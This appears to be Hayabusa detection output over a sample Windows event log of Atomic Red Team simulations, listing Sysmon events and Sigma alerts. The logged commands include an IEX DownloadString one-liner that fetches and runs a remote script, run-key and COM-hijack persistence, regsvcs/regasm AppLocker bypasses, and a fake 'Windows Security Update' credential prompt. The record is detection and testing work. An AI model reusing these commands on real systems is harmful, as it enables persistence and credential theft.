747F3D96-D765-5D31-0000-001086B92800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5824 | PGUID: 747F3D96-D765-5D31-0000-0010D7BD2800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | LID: 0x50951 | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team | Process: C:\Windows\system32\reg.exe | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4264 | PGUID: 747F3D96-D765-5D31-0000-001024C32800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D772-5D31-0000-0010BEE52800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | LID: 0x50951 | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1: C:\Path\AtomicRedTeam.dll | Process: C:\Windows\system32\reg.exe | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6472 | PGUID: 747F3D96-D772-5D31-0000-001031EB2800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | LID: 0x50951 | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1 | Process: C:\Windows\system32\reg.exe | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D772-5D31-0000-00107CF02800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString(`""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`"")"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Persis,Startup Folder File Write,,../hayabusa-rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,,PowerShell Writing Startup Shortcuts,,../hayabusa-rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6748 | PGUID: 747F3D96-D7A3-5D31-0000-0010A0A22900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | LID: 0x50951 | PID: 4784 | PGUID: 747F3D96-D7A3-5D31-0000-0010F2A42900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 6344 | PGUID: 747F3D96-D7A3-5D31-0000-001035B02900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D7A3-5D31-0000-001081B22900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | LID: 0x50951 | PID: 6176 | PGUID: 747F3D96-D7A3-5D31-0000-0010D2B42900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D7A4-5D31-0000-0010C9C22900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-D7A4-5D31-0000-001020C62900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2056 | PGUID: 747F3D96-D7BB-5D31-0000-0010E7FE2900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 4124 | PGUID: 747F3D96-D7BB-5D31-0000-00108F082A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.767 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\(Default): mscoree.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.775 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\ThreadingModel: Both | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.787 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.802 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.817 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.824 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.830 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.841 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:20.858 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4256 | PGUID: 747F3D96-D7DB-5D31-0000-001089A52A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | LID: 0x50951 | PID: 4452 | PGUID: 747F3D96-D7DB-5D31-0000-0010B5A82A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence or CredAccess - Lsa NotificationPackge | SetValue: HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages: Binary Data | Process: 